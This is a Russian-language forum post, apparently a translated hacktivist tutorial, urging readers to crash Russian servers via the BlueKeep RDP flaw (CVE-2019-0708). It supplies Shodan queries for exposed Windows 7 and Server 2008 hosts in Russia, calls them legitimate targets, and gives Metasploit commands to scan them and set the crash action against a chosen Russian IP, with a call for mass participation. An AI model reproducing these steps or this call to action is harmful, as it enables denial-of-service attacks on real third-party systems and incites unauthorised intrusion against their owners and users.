Сбой (DoS) российских серверов с уязвимостью Bluekeep

  • Автор темы Автор темы LeSh1y777
  • Дата начала Дата начала

LeSh1y777

Пользователь
Регистрация
25/9/25
Сообщения
5,682
Репутация
49
Лайки
153
Депозит
-8.95$
Добро пожаловать обратно, мои начинающие кибервоины!

Жестокое вторжение Путина на Украину должно быть остановлено. Пока украинцы терпят бомбёжки и живут без тепла и электричества, те из нас, кто обладает навыками и знаниями, обязаны делать всё возможное, работая в тёплых, уютных офисах и домах. Помните: Путин не остановится на Украине!

Уязвимость Bluekeep

В мае 2019 года была объявлена новая уязвимость безопасности в операционной системе Windows, созданной на основе Windows NT (Windows 2000, XP, Windows Vista, Windows 7, Server 2000, Server 2003 и Server 2008), которая эксплуатирует переполнение кучи в службе RDP этих операционных систем. Уязвимости присвоено обозначение CVE-2019-0708. Эта уязвимость относится к числу наиболее опасных, поскольку позволяет злоумышленнику удалённо выполнить код в системе. В некоторых случаях, если удалённый код не выполняется, это может привести к появлению на целевых системах опасного синего экрана смерти (BSOD), фактически вызывая отказ в обслуживании (DoS).

В России есть несколько таких систем, подключенных к интернету. Мы можем легко найти их, используя Shodan, выполнив поисковый запрос:

страна:ru порт:3389 ос:”windows 7″

страна:ru порт:3389 ос:”windows server 2008″


Shodan находит 281 систему под управлением Windows 7 и 272 системы под управлением Windows Server 2008. Все эти цели являются законными.

6a4a49_d5f4b90b4533471c907fd4725123c730~mv2.png


Механизм Bluekeep

Протокол RDP использует виртуальные каналы в качестве пути передачи данных между клиентом и сервером. Это взаимодействие происходит до аутентификации. Существует вероятность повреждения кучи, что позволит выполнить произвольный код с системными привилегиями. Я обнаружил, что это происходит редко, но синий экран смерти возникает практически всегда.

Исследователи безопасности Rapid 7 опубликовали эксплойт для этой уязвимости в сентябре 2019 года.

Шаг №1 : Найдите Bluekeep в Metasploit

Первый шаг — запустить Metasploit в Kali или любой другой платформе для атак.

Теперь найдите эксплойт Bluekeep.

msf5> поиск bluekeep

6a4a49_fb75c39d14ed4407911654db838d4bd2~mv2.png


Как видите, есть два модуля с ключевым словом bluekeep в названии. Давайте выберем вспомогательный модуль для аварийного завершения работы сервера.

msf5> использовать вспомогательный/сканер/rdp/cve_2019_0708_bluekeep

6a4a49_20709727fb2a49518a2b457a68aa1ec1~mv2.png


Затем укажите удалённый хост или IP-адрес целевого устройства. Выберите один из IP-адресов, найденных в Shodan. Для демонстрации я использую систему Windows 7 в своей лабораторной сети.

msf > set RHOSTS 192.168.1.101 ( замените на IP российского сервера )

msf> запустить


6a4a49_fcfb0ceb9be0487fa41d982c59ca94e7~mv2.png


Как видите, этот модуль обнаружил, что сервер уязвим.

На последнем этапе нам нужно установить ДЕЙСТВИЕ на Сбой.

msf5 > set ACTION Crash

msf5 > запустить


6a4a49_775297309efb4199a20d45ee0ce86468~mv2.png


Как видите, Metasploit сообщает, что система дала сбой! Отличная работа!

При запуске нашей системы Windows 7 мы видим синий экран смерти (BSOD).

6a4a49_f4f784a4198e43f29a9cdfe17433caf3~mv2.png


Краткое содержание:

Жестокое вторжение России на Украину вынуждает каждого из нас сделать всё возможное, чтобы помочь. Как хакеры, мы обладаем навыками, позволяющими вывести из строя цифровую инфраструктуру России. Хотя эта атака не сработает против всех систем в России, не обязательно выводить из строя каждую из них, достаточно вывести из строя хотя бы одну. Нас, работающих против России, более 200 000. Даже если каждый из нас сделает хоть немного, последствия будут разрушительными!

ОстановитеПутинаСейчас!
 
Назад
Сверху Снизу